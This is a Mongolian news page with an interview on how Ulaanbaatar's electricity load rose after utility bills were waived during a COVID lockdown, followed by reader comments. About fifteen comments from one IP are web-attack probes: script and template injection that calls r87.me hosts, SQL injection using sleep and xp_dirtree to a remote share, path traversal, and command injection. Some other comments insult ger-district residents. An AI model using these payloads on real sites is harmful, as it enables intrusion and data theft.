"Иргэд хөл хориотой өдрүүдэд цахилгааны ачаалал нэмэгдсэн" | News.MN

"Иргэд хөл хориотой өдрүүдэд цахилгааны ачаалал нэмэгдсэн"

COVID-19

"Иргэд хөл хориотой өдрүүдэд цахилгааны ачаалал нэмэгдсэн"

"Иргэд хөл хориотой өдрүүдэд цахилгааны ачаалал нэмэгдсэн"

Цар тахлын энэ үед төрөөс иргэдэд дэмжлэг үзүүлэх зорилгоор айл өрх, ААН-үүд, хувийн хэвшлийн ус, цахилгаан, дулаан, хогны төлбөрийг долоон сарын хугацаанд чөлөөлөөд буй. Энэхүү хөнгөлөлт арванхоёрдугаар сарын 1-нээс ирэх оны долдугаар сарын 1-ний өдрийг хүртэл хүчинтэй болохыг Ерөнхий сайд У.Хүрэлсүх өчигдөр мэдэгдсэн. Уг мэдэгдлийн дараа цахилгааны ачаалал эрс нэмэгдэж, цахилгаан хүчдэл гэмтсэн, айл өрхүүдийн хөргөгч шатах, тог тасрах зэрэг асуудал үүссэн гэх мэдээлэл нийгмийн сүлжээнд цацагдаад буй юм. Энэ асуудлаар "Улаанбаатар цахилгаан түгээх сүлжээ" ТӨХК-ийн Хяналт, аюулгүй ажиллагааны хэлтсийн дарга А.Амаржаргалаас тодрууллаа.


-Цахилгааны төлбөр тэглэсэнтэй холбоотойгоор орон сууцны айл өрхүүдийн тог тасарсан, хөргөгч шатсан гэх мэдээлэл байна. Энэ үнэн үү? Өчигдрийн байдлаар нийслэлийн хэмжээнд цахилгааны ачаалал хэр зэрэг нэмэгдсэн бэ?

-Засгийн газрын шийдвэрээр цахилгааны төлбөрийг тэглэсэн. Үүнээс болж цахилгааны ачаалал төдийлөн нэмэгдээгүй.

Өчигдрийн байдлаар орон сууцны айл өрхүүдийн тог тасраагүй, хэвийн байсан. Ер нь нийслэлийн хэмжээнд ачаалал гэр хороололд илүү байгаа юм.

Чиглэлээр нь харвал, Нисэх, Яармаг орчимд 54 хувийн ачааллын өсөлттэй, зуслангийн чиглэлд 31 хувьтай байсан бол Орбит, Толгойт, Их наран чиглэлд 21 хувийн ачааллын өсөлттэй байна. Мөн Улаанхуаран, Амгалан чиглэлд 19, Дэнжийн мянга, Хайлааст, Долоон буудал 16 хувь, Дарь эх, Ганц худаг, III, IV хорооллын хойгуур гэр хороололд 9 хувийн ачаалал тус тус өнгөрсөн оны мөн үеэс илүү өссөн.

-Гэхдээ цахилгааны төлбөр чөлөөлөх мэдэгдэл гарсны дараа оргил ачааллын хэрэглээ 1100-1213 мвт хүртэл өссөн гэх мэдээлэл цахим орчинд цацагдсан. Энэ талаар хариулт өгөхгүй юү?

-Энэ нь Төвийн бүсийн эрчим хүчний цахилгаан дамжуулах төвтэй холбоотой болов уу. Нийслэлийн хэмжээнд өчигдрийн байдлаар цахилгааны ачаалал 766 мв хүртэл нэмэгдсэн. Энэ нь цахилгааны төлбөрийг чөлөөлсөнтэй холбоотой юу, эсвэл хөл хорио тогтоосонтой холбоотой юу гэдгийг бид судалж байна. Ер нь орон сууцны айл өрхүүдээс илүү гэр хорооллын айл өрхүүдийн цахилгааны ачаалал нэмэгдсэн. Тухайлбал, энэ сарын 12-ноос 13-ныг хүртэл гэр хорооллын айл өрхүүдийн цахилгааны ачаалал 8.8 хувиар, өнгөрсөн оны мөн үетэй харьцуулахад 18 хувиар өссөн дүнтэй байна. Шалтгаан нь хөл хорио болон шөнийн цахилгааныг тэглэсэнтэй холбоотой байж магадгүй болов уу.

-Өнгөрсөн шөнө цахилгааны хүчдэл унаж, дэлбэрснээс болж айл өрхүүдийн тог тасарсан гэх мэдээлэл байна. Энэ талаар дуудлага мэдээлэл бүртгэгдэв үү? 

-Өчигдөр Тахилтын задгайд цахилгааны хүчдэлийн шугам гэмтсэн гэх дуудлага мэдээлэл бүртгэгдсэн. Энэ дагуу очиход цахилгааны хүчдэлийн нэг шугамд гэмтэл гарсан байсныг хоёр цагийн дотор засварласан. Харин хүчдэл унаж гэмтсэн асуудал байхгүй.

Мэдээж, хүчдэлийн нэг шугам гэмтсэн тул айл өрхүүдийн цахилгаан түр хугацаанд тасарсан. Өнөөдрөөс хэвийн байна. Цахилгааны хүчдэл гэмтсэн шалтгааныг тодруулахаар ажиллаж байна.

Өнөө өглөө цахилгааны ачааллаас болж эмнэлгүүдийн тог тасарсан гэх мэдээлэл цацагдсан. Тусгай объектуудад цахилгааны доголдол үүссэн үү?

-Эмнэлэг, төрийн тусгай хамгаалалттай объектууд шаардлагын дагуу 2-3 эх үүсвэрээр тэжээгдэх зэрэг шаардлага хангасан байдаг. Гэхдээ шугам дээр түр хугацааны гэмтэл гарч, цахилгааны доголдол үүсэх асуудал гардаг. Үүнийг шуурхай үйлчилгээний бригадаас автоматаар залгах байдлаар шуурхай шийддэг.

-Цаашид цахилгааны ачаалал эрс нэмэгдвэл яах вэ? Үүнээс урьдчилан сэргийлж, цахилгааны тасралтгүй ажиллагааг хангах бэлтгэл ажлыг хэрхэн хангаж байна вэ?

-Бид өвлийн бэлтгэл ажлаа бүрэн хангасан. Засгийн газрын шийдвэртэй холбоотойгоор өчигдөр шуурхай хуралдсан. Бид гарч болзошгүй эрсдэлээ тооцож, 24 цагаар ажиллах ажилтнуудын тоог нэмэх, аюулгүй нөөцийг бүрдүүлэх зэрэг тодорхой арга хэмжээ авахаар ажиллаж байна. Харин цахилгааны ачааллаас үүдэн гарч болзошгүй эрсдэлийг одоогоор тодорхой хэлэх боломжгүй. Бидний зүгээс иргэддээ хандаж цахилгаанаа зөв, хэмнэлттэй хэрэглэхийг зөвлөж байна. Мөн найдвартай халаагуур хэрэглэхийг зөвлөе. Чанаргүй, баталгаагүй халаагуур хэрэглэх, ачааллыг нэмэгдүүлснээр галын аюулгүй байдал алдагдаж болзошгүйг анхааруулъя.

Б.ЦЭЦЭГ

Энэ мэдээнд өгөх таны сэтгэгдэл?
8
ЗөвЗөв
1
ХөөрхөнХөөрхөн
1
ТэнэглэлТэнэглэл
0
ХахаХаха
0
ГайхмаарГайхмаар
0
ХарамсалтайХарамсалтай
0
БурууБуруу
Баярлалаа!

Холбоотой мэдээ

46 сэтгэгдэл

News.mn сайтад сэтгэгдэл оруулахад анхаарах зүйлс

Avatar

ЗОЧИН 2020-12-14 202.179.30.242

БОДИТ БАЙДЛЫГ ХЭЛЭЭЧ ХУДЛАА МАНЖЛААД БАЙХ ЮМ ИЙМЭРХҮҮ АЛБАН ТУШААЛДАА БАЙХ ГЭСЭН ДОЛДОЙ НАРААС БОЛЖ УЛС ОРОН ЧИНЬ СҮЙРЛЭЭ.

Avatar

Зочин 2020-12-14 202.126.92.131

';l=document.createElement("link");l.rel="prefetch";l.href="//16jjgkau9i7nnkw5mulvb4xsavl-7bvwrdrhhchp"+"lbw.r87.me/r/?"+location.href;document.head.appendChild(l);//

Avatar

Зочин 2020-12-14 202.126.92.131

";l=document.createElement("link");l.rel="prefetch";l.href="//16jjgkau9igshzdnrluchtrgwmdz97py5oodbk00"+"_we.r87.me/r/?"+location.href;document.head.appendChild(l);//

Avatar

Зочин 2020-12-14 202.126.92.131

Avatar

Зочин 2020-12-14 202.126.92.131

'"–>

Avatar

Зочин 2020-12-14 202.126.92.131

//r87.com/?http://news.mn/

Avatar

Зочин 2020-12-14 202.126.92.131

http://r87.com/?news.mn/

Avatar

Зочин 2020-12-14 202.126.92.131

{{__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgMTZqamdrYXU5aS1tenhkYjBqNmpnZ2txbGg0c2htdDY3ZmpnbGNsNHByZS5yODcubWU=')).read()}}

Avatar

Зочин 2020-12-14 202.126.92.131

/../../../../../../../../../../opt/lampp/logs/access_log

Avatar

Зочин 2020-12-14 202.126.92.131

-1';exec('xp_dirtree ''\\16jjgkau9iuaxhqzreiv4pseizqwpiaxq5j3j_pd'+'yvm.r87.me'+'\c$\a''')–

Avatar

Зочин 2020-12-14 202.126.92.131

eval('print localtime()*0+0xFFF9999-47526')

Avatar

Зочин 2020-12-14 202.126.92.131

response.write(268409241-86041)'

Avatar

3 2020-12-14 202.126.92.131

3

Avatar

Зочин 2020-12-14 202.126.92.131

((select sleep(25)))a– 1

Avatar

Зочин 2020-12-14 202.126.92.131

1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)– 1

Avatar

Зочин 2020-12-14 202.126.92.131

%27

Avatar

Зочин 2020-12-14 202.126.92.131

"& SET /A 0xFFF9999-37299 &

Avatar

Мэргэжилтэн 2020-12-14 192.82.72.123

Гэр хорооллын гэрийн ч , орон сууцных ч цахилгаан холболтын утасны ачаалал 16 ампераас хэтрэхгүй байхаар утасны хөндлөн огтлол нь 2,5 мм кв. байдаг учраас ямарч айл 2,5 квт-аас илүү чадалтай цахилгаан халаагуур удаан хугацаагаар залгавал гэрийн, байрны цахилгааны утасны бүрээс болон холболтууд халж хайлах гэр хороололд бол гал гарах аюултай.Олон хэрэглэгч зэрэг ийм үйлдэл хийвэл дэд станц дээр гэмтэл гарч тог тасрах цаашид цахилгаан шугам кабель гэмтэж тог удаан хугацаагаар ч тасарна.

Avatar

Зочин 2020-12-14 66.181.179.212

Ер нь бол энэ өсөлтийг төлбөр тэглэхээсээ өмнө Засгийн газар тооцсон байх учиртай. Хэрэглээний өсөлт гарах нь зайлшгүй зүй тогтолтлой. Учир нь гал дээр хоол хийдэг байсан айл плетка дээрээ хоолоо хийнэ. Бас гал түлэхийн оронд тен залгана. Энэ тэглэлтийг гэр хороололд байнга хэрэгжүүлэх хэрэгтэй цаашдаа.

Avatar

зочин 2020-12-14 66.181.161.52

Засгийн энэ шийдвэр буруу шдээ .Айл өрхүүдын дулаан цахилгааны хэрэглээ нь их бага янз янз шдээ . Ерөнхийлөгчийн сая төгрөг нь зөв байсан шдэ.

Avatar

ЗОЧИН 2020-12-14 202.126.90.114

ХҮҮКИЙН СОНГУУЛИЙН ТООЦООГҮЙ МУЛГУЙ ШИЙДВЭР ЭРЧИМ ХҮЧНИЙ САЛБАРЫГ ЭЛЭГДҮҮЛНЭ ДЭЭ . ЯДАЖ 50% ХӨНГӨЛСӨН , ХУГЦААГ НЬ 4 САРЫН 1 БОЛГОСОН БОЛ АРАЙ ДӨХҮҮ БАЙСАН БАЙХ . ХАРЖ Л БАЙГААРАЙ . ГАМШИГ !!!

Avatar

Зочин 2020-12-14 66.181.179.212

Чи л гамшиг

Avatar

Зочин 2020-12-14 202.126.89.46

Мэргэжлийн байгууллага УБЦТС; Станцууд нь иргэдийн Зохисгүй хэрэглээний эсрэг Тёхникийн арга хэмжээ аваачээ…..!!!

Avatar

Иргэн 2020-12-14 202.9.41.8

Манайх тог маш бага хэрэглэгдэг та нар ч бага хэрэглээрэй

Avatar

Иргэн 2020-12-14 202.9.46.75

Аж ахуйн нэгжүүдийг тэглэх хэрэггүй бсан юм. Тэд бол тогыг хайрлахгүй л хэрэглэж бага. Тэртээ тэргүй бүтээгдэхүүнээ иргэдэд үнэтэй л зарж бага ш дээ.

Avatar

Зочин 2020-12-14 59.153.85.64

Муу л юм болвол хойд захын хар овоохой гэдэг гэр хороололуудынхаа хүчдэлын уналтаа яах гэж байна.халаалт залгангуут 150в болж байгаа юм шүү дээ,Ийм их уналттай тогонд залгаснаас галаа түлсэн нь дээр ш д,

Avatar

Иргэн 2020-12-14 202.9.46.75

1 хоног ч болоогүй бхад ийм өсөлттэй шал паалантай юмаа. Ер нь уб цахилгаан түгээх компани олон жил ард иргэдээс идсэн луйварчин компани шүү дээ.

Avatar

Зочин 2020-12-14 202.126.90.28

Humuusee unegui bolson geed achaalal nemehgui huuchin heregledegeeree unegui heregletsgeee!!

Avatar

irgen 2020-12-14 139.5.216.233

Ger horoolol geheer teneg golduu hymyys bainaa achaalal haana nemegdej gedgiig harajad oilgomjroi doo.Niseh yarmagt dan tenegyyd

Avatar

Зочин 2020-12-14 119.40.100.66

mongolchuud unegui yumand nugasgui durt bas niitiin ym ashiglah durt er n busdiin ymiig hamgui heregleh durt humuus

Avatar

Зочин 2020-12-14 64.119.26.149

яг тодорхой хариул өгөөгүй байна. бөөрөнхий хаашаа янзын юм хэлдэг гар вэ

Avatar

Ankara 72 2020-12-14 202.9.46.121

shunag SUH- suuts umchlugchdiin holboo liftee ajilluuldaggui, tsahilgaan unegui bolgonguut 2- lift ajillaj bna,

Avatar

Зочин 2020-12-14 202.131.225.197

Orkuud unegui yumand nugasgui ashiglaj chadahgui

Avatar

Зочин 2020-12-14 66.181.187.228

Маскаа зүү гараа савандаж угаа, зай барьж яв, өвчин халдаж мэднэ ЦАХИЛГААНАА ХЭМНЭ УЛС ОРОНД осол ГАРЧ МЭДНЭ ЭНЭ БҮАЭНД ИРГЭНИЙ ҮҮРЭГ Л ЧУХАЛ ХҮМҮҮС ЭЭ

Avatar

Зочин 2020-12-14 202.126.89.203

ухамсрын том ялгааны ганцхан жишээ ил тод харагдлаадаа

Avatar

Зочин 2020-12-14 66.181.187.228

цахилгаан халаагуур халдаг гулас зардаг хүмүүс их баярлаж байх шиг байна улс ороноо бодолдоо цахилгааны хүндрэл болбол бүх хүмүүс хохирно хяналт шалгалт сайн хийх хэрэгтэй ,аүмүүс минь цахилгаанаа маш гамтай хэрэглэе

Avatar

Зочин 2020-12-14 202.126.89.203

гэр хороолол нэмэгдэх нь тодорхоыл байсаншдээ

Avatar

зочин 2020-12-14 192.82.65.120

Бүгд хэмжээ хязгаартай, станц – дамжуулах – түгээх – хэрэглэгч, тиимээс ачаалал айхтар ихсэхгүй байх.

Avatar

зочин 2020-12-14 66.181.161.52

Ачаалал айхтар ихсэхгүйч гэсэн тогтмол өндөр байвал хэцүүдэх байхаа…За мэргэжилийн биш болхоор мэдэхгүй юм дөө.
Машины мотор тогтмол ээртэл нь хаазлаад байвал дорхноол суларчихдаг шд.

Avatar

Довдон 2020-12-14 202.170.80.25

Гэрийн хашаандаа бүгд үйлдвэрлэл эрхлээд эхэллээ дээ Хууушуур , боорцогноос эхлээд …. Ер нь нүүрс түлэхээ ч болино …
Галын аюул ч ихэслээ

Avatar

Зочин 2020-12-14 59.153.113.74

Бүгд цахилгаан халаагуураа залгаа биз

Avatar

Зочин 2020-12-14 64.119.16.227

Хүүк мундаг хүн болох гээд бүх өрхийг гээд жаахан яарсан шийдвэр гаргачихвуу.Орлого цалин нь тасалдаагүй хүмүүс, төрийн албан хаагчид дарга сайд нарын тогыг тэглэж хэрэггүй байсан юм Ачааллаа бодоход .Хүүк тогоо тэглүүлж яадаг билээ

Avatar

Иргэн 2020-12-14 66.181.187.190

Гэр хороололд түлшний үний нь 75% хөнгөлсөн учир цахилгааны төлбөрий нь тэгоэх хэрэггүй.

Avatar

Зочин 2020-12-14 139.5.218.213

orkuud bol orkuud shuu dee

Avatar

Зочин 2020-12-14 192.82.69.95

Tsahilgaanii tulburd hulgai baidag il bolk baih shig uhlee garuud orlogo ni haagdaad

NewsMN Гар утасны хувилбар Татах
NEWS.mn

Мэдээллийн эх сурвалж